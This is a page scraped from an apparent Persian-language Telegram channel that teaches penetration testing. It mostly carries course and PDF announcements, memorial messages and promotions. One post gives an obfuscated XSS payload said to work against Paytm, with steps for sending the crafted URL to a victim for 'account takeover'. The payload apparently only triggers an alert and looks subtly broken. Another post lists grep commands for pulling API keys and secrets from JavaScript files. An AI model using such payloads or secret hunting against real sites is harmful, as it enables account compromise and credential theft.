Try Hack Box
6.14K subscribers
696 photos
65 videos
129 files
708 links
1 Nov 2020
1399/08/11
آموزش تست نفوذ و ردتیم

https://linkedin.com/company/tryhackbox-org/

یوتیوب
https://youtube.com/@tryhackbox

کانال ها :
@TryHackBoxOfficial ( نقشه راه )
@TryHackBoxStory ( اخبار و داستانهای هک )
پشتیبانی : @ThbxSupport
Download Telegram
Session Fixation and Hijacking(fa).pdf
1.2 MB
آموزش
Session Fixation and Hijacking
به فارسی
اول میریم به سراغ تعریف خود Session و اهمیت session ها
سایت stateful و stateless چه تفاوتی دارد
و بعد از اون Session id ها چی هستن
و در اخر خود حملات رو توضیح میدیم و تفاوت بین شون رو متوجه میشیم

✍️نویسنده
🥀 @TryHackBox | The Chaos
🔥5🕊4👍3👌1
با کمال احترام، مراسم چهلم عزیزان از دست رفته را به دوستان، خانواده و آشنایان آنها تسلیت می‌گوییم. در این روزهای سخت، ما را در غم خود شریک بدانید. 🕊🖤🥀

دوستان ۲۷ و ۲۸ چهلم عزیزان از دست رفته هست ولی به دلیل فعالیت ، گفتم یادم نشه تسلیت رو عرض کنیم .🖤🕊

با آرزوی صبر و آرامش برای شما

تیم TryHackBox
29🫡14🕊5👎1
Cross-site Scripting and HTML Injection .pdf
1.1 MB
📖 XSS & HTML Injection 🥀

🕊 @TryHackBox
👍7🕊1
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :


💠 کانال های تلگرام ما :

🔶 آموزش تست نفوذ و Red Team
🆔
@TryHackBox

🔶 رودمپ های مختلف
🆔
@TryHackBoxOfficial

🔶 داستان های هک
🆔
@TryHackBoxStory

🔶 آموزش برنامه نویسی
🆔
@TryCodeBox

🔶 رادیو زیروپاد ( پادکست ها )
🆔
@RadioZeroPod


👥 گروه های پرسش و پاسخ

🔷 هک و امنیت
🆔
@TryHackBoxGroup
🔷 برنامه نویسی
🆔
@TryCodeBoxGroup


🔴 اینستاگرام :
🔗
http://www.instagram.com/TryHackBox

🔵 یوتیوب :
🔗
https://youtube.com/@tryhackbox

🟠 گیت هاب ما :
🔗
https://github.com/TryHackBox/

🟣 لینکدین ما :
🔗 https://www.linkedin.com/company/tryhackbox-org
5
۷ هک اصلی ترمینال که سرعت کارت را چند برابر می‌کند 🔥
بیشتر کاربران در کنسول کند کار می‌کنند، چون قابلیت‌های پایه را نمی‌شناسند. ساعت‌ها وقت صرف جست‌وجوهای بیهوده و کارهای تکراری می‌شود، در حالی که همان کار را می‌توان با چند دستور ساده انجام داد. این‌ها ابزارهایی هستند که همین امروز سرعت کارت را به‌طور محسوسی افزایش می‌دهند.

ادامه را در لینکدین بخوانید :
https://lnkd.in/ePMmz6Fq

دوستان ما را در لینکدین دنبال کنید

🥀 @TryHackBox
5🕊2
🎙 قسمت سوم RadioZeroPod |  داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی


🕊 داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی ...

🥀 این پادکست درباره نفوذ فیزیکی به یکی از بانک‌های لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!

🕊 • کل داستان مجموعه‌ای از واقعیت‌ها است که با نظرات شخصی او از سخنرانی‌ها، مصاحبه‌ها و گفت‌وگوهای پشت صحنه ترکیب شده است. اگر علاقه‌مندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده پادکست را گوش بدید و نظراتتون رو بگید .

💠  https://youtu.be/g_Q3jy5yamc


🆔 @TryHackBox
🆔
@TryHackBoxOfficial
🆔
@TryHackBoxStory
🆔
@TryCodeBox
🆔
@RadioZeroPod
6👍2
🕊 دراپ کردن یه پچ XSS اخیر در Paytm!

👀 مراحل :
1. پیلود رو در search box وارد کن.
2. URL رو کپی کن.
3. به victim بفرست.
4. takeover حساب با یک کلیک!!

پیلود :

<svg onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>


🥀 @TryHackBox
#باگ_بانتی #xss
5
همکاری در زمینه تدریس، تولید محتوا و پادکست

ما به دنبال دوستانی هستیم که علاقه‌مند به تدریس، تولید محتوا، ترجمه و همچنین فعالیت در حوزه پادکست هستند. اگر شما نیز تمایل به همکاری در این زمینه‌ها دارید، خوشحال می‌شویم که با شما ارتباط برقرار کنیم.

برای کسب اطلاعات بیشتر و جزئیات همکاری، لطفاً پیام بفرستید:
@THBxSupport
🕊27 و 28 و 29 بهمن چهلم عزیزانیه که خیلی زودتر از رویاهاشون به ناحق خاموش شدن..

از رفتـنِ لاله‌هـــــا، چهـــل روز گذشت
بـا داغ جوانـــــانِ دل‌افــــروز گذشت

دردا، که به جــایِ وصــل، دوراِنِ فــراق
بگذشت به ما و سخت جانسـوز گذشت!

چهل روز گذشت. چهل سالم بگذره داغشون فراموش نخواهد شد،،،به یادشان که در جسمشان در بین ما نیست ولی روحشان چراغ راه آینده ایران شد🕊🌹🫡

🥀 یادشون گرامی و نامشون جاودان 🖤

از طرف تیم TryHackBox 🥀
🕊2710👎1😍1💯1🍾1
معرفی تیم TryHackBox به اعضای محترم کانال

درود به همه شما عزیزان!

در تیم TryHackBox، ما به آموزش و یادگیری به عنوان یک سفر هیجان‌انگیز نگاه می‌کنیم، نه صرفاً یک مقصد. برخلاف بسیاری از اکادمی‌ های موجود، هدف ما این است که به شما کمک کنیم تا درک عمیق‌تری از علم و مهارت‌های مورد نیاز در دنیای فناوری اطلاعات پیدا کنید.

ما معتقدیم که دوره‌های آموزشی می‌توانند نقطه شروع خوبی باشند، اما این تنها آغاز راه است. ما شما را تشویق می‌کنیم تا فراتر از محتوای دوره‌ها فکر کنید و خود را به چالش بکشید. ما دوست داریم هر یک از شما به یک جویای علم تبدیل شوید؛ کسی که با اشتیاق به دنبال کشف و یادگیری است و همواره در پی به‌روز کردن مهارت‌های خود می‌باشد.

تیم ما متشکل از افراد با تجربه در زمینه‌های مختلف امنیت سایبری و فناوری اطلاعات است که با عشق و علاقه، دانش خود را به شما منتقل می‌کنند. ما با ارائه محتوای آموزشی کاربردی و چالش‌های واقعی، به شما کمک خواهیم کرد تا در دنیای پیچیده فناوری به یک متخصص واقعی تبدیل شوید.

صرفاً تدریس یک دوره یا چند دوره و دریافت وجه از دانشجو کافی نیست. هدف ما این است که دانشجو واقعاً بفهمد علم فراتر از چارچوب چند دوره محدود است. این دوره تا حدی به او کمک می‌کند، اما پس از آن او باید با انگیزه و کنجکاوی پژوهشی به یادگیری مستقل ادامه دهد و جویای علم شود.
به جمع ما بپیوندید و با هم به سمت آینده‌ای روشن‌تر برای کشورمان در دنیای امنیت سایبری حرکت کنیم!



اگر مایل به عضویت در تیم ما هستید، لطفاً با آیدی زیر در ارتباط باشید:
@ThbxSupport

با آرزوی موفقیت برای همه شما!
6
Network_Security_VAPT_Checklist.pdf
151.6 KB
🔖 چک‌ لیست VAPT امنیت شبکه

🥀 @TryHackBox
#Checklist
9
✎ نکات Grep برای تحلیل جاوااسکریپت 🥀

• استخراج فایل‌ های جاوااسکریپت از دایرکتوری‌ های recursive 

find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \\;


• جست‌وجو برای کلیدهای API و رمزها 

cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"


• شناسایی فراخوانی‌ های توابع خطرناک 

cat * | grep -rE "eval|document\\.write|innerHTML|setTimeout|setInterval|Function"

• بررسی Manipulation ی URLها 

cat * | grep -rE "location\\.href|location\\.replace|location\\.assign|window\\.open"


• جست‌وجو برای درخواست‌های Cross-Origin 

cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files


• تحلیل استفاده از postMessage 

cat * | grep -r "postMessage"


• پیدا کردن URLها Endpoints یا Hardcoded 

cat * | grep -rE "https?://|www\\."


• شناسایی اطلاعات Debugging
 
cat * | grep -rE "console\\.log|debugger|alert|console\\.dir"


• بررسی نحوه مدیریت ورودی کاربر 

cat * | grep -rE "document\\.getElementById|document\\.getElementsByClassName|document\\.querySelector|document\\.forms"

برای تحلیل کدهای جاوااسکریپت و شناسایی نقاط ضعف، از این نکات استفاده کنید و در نظرات خود تجربیات و یافته‌های خود را به اشتراک بگذارید! چه ابزارها یا روش‌های دیگری را برای بررسی کدهای جاوااسکریپت پیشنهاد می‌کنید؟

@TryHackBox
#باگ_بانتی #ریکان #جاوااسکریپت
10🔥17👍31
دوستان عزیز،لطفاً با به اشتراک‌گذاری مطالب و ریکشن به پست‌ ها، از ما حمایت کنید. همکاری شما باعث می‌شود تا جامعه‌ مان را گسترش دهیم. سپاسگزاریم! 🖤🥀🕊
113😍1
درود خدمت دوستان گرامی بنده اینجا روی حملات اکتیو دایرکتوری و مباحث ردتیم تمرکز خواهم کرد و سناریوها و معرفی و اطلاعات جامع در مورد پروتکل ها و موارد دیگر که تجربه بنده هست رو در اختیار شما عزیزان قرار میدهم .

@KavehOffSec
18👍7🤝3🔥1
Try Hack Box
نگاهی به پست های قبل : لینک‌ های پنهان: تحلیل خانواده‌ های مخفی اپلیکیشن‌ های VPN . پروژه جدیدمون چک لیست آسیب‌پذیری RCE مهندسی اجتماعی در ردتیمینگ تب‌های مفید Burp Suite پنتست به روش «جعبه‌سفید» ماتریس تاکتیک‌های MITRE ATT&CK تمام اندپوینت ها را از یک…
نگاهی به پست های قبل :

پیدا کردن paramهای پنهان در فایل‌ های JavaScript

TryHackMe Course - Pre Security | قسمت 01

اکسپلویت‌های خودکار توسط هوش مصنوعی

بررسی WAF در برابر RASP: قفل در مقابل محافظ داخلی! مقایسه کامل دو غول امنیت برنامه‌های تحت وب

مهندسی اجتماعی دروغ‌پردازی سازمان‌یافته

تو جای هکر بودی، چه داستانی می‌ ساختی؟

مینی دوره #رایگان راهنمای عملی تست نفوذ | قسمت اول مبانی شبکه برای پنتسترها |  وایرشارک |  WireShark

بررسی SQL Injection (SQLi) : Blind, Time-Based, Error-Based - بخش اول

باگ بانتی Mobile Hacking : چک‌ لیست عملی

قسمت اول بوتکمپ SOC 0x4131!

قسمت دوم بوتکمپ SOC 0x4131!

آموزش Session Fixation and Hijacking

فاز اول ردتیم قسمت اول  - قسمت دوم

۷ هک اصلی ترمینال که سرعت کارت را چند برابر می‌کند

قسمت سوم RadioZeroPod |  داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی

نکات Grep برای تحلیل جاوااسکریپت

چگونه مهاجمان از هوش مصنوعی برای انجام وظایف مختلف استفاده می‌کنند

برای آموزش های بیشتر به ما بپیوندید :
@TryHackBox | @TryHackBoxOfficial
👍5
#ّگفتگو

در تجربه شما با استفاده از گزینه "Use suite scope" در ابزارهای تست امنیتی، چه چالش‌هایی را مواجه شدید و چگونه بر آنها غلبه کردید؟ آیا پس از فعال‌ سازی این گزینه، بهبودی در عملکرد خود در شناسایی باگ‌ ها مشاهده کردید؟ لطفاً مثالی از یک مورد خاص به اشتراک بگذارید. همچنین، آیا تفاوت‌ های خاصی در روش‌ های کار با این ابزارها با و بدون این گزینه مشاهده کرده‌اید و چگونه این تفاوت‌وها نتایج شما را تحت تأثیر قرار داده است؟ در نهایت، چه عواملی شما را به استفاده از "Use suite scope" تشویق کردند و آیا تصمیم دارید این روش را در آینده ادامه دهید؟ چرا؟

دوستان این بخشی از مطالب کتاب جدید ما هست و دوستانی که اشنایی با Use suite scope ندارند آشنا می شوند .



لینک گروه جهت مشارکت در این گفتگو :

https://t.me/+XPV3S0tygl1lZGE0


#باگ_بانتی
Forwarded from ⚔️ Ethical Hacking ⚔️ (Sajjad Teymouri)
🎉 تخفیف ویژه ۵۰٪ روی دوره‌های آموزشی؛ فرصتی عالی برای ورود جدی به دنیای SOC و امنیت سایبری

این دوره‌ها بر اساس تجربه عملی در بازار کار و نیاز واقعی شرکت‌ها طراحی شده‌اند و تاکنون صدها ساعت آموزش کاربردی و مبتنی بر پروژه ارائه شده است.

1️⃣ دوره جامع SOC Tier 1 (بر اساس تجربیات عملی بازار کار)

2️⃣ دوره تخصصی SOC Tier 2 (مخصوص بازار کار – در حال برگزاری)

3️⃣ دوره جامع پیش‌نیازهای تست نفوذ (۹ دوره در یک مسیر کامل)

و...

برای مشاوره رایگان و ثبت نام با ایدی زیر در تلگرام در تماس باشید.

🆔 https://t.me/steymouri93


نکته : دوستانی که شرایط اقتصادی خوبی ندارند امکان خرید اقساطی هم براشون فراهم هست.
من با اکثر بچه‌ها کنار میام ❤️



مارو به دوستاتون معرفی کنید.

🆔 @Sajjad_Teymouri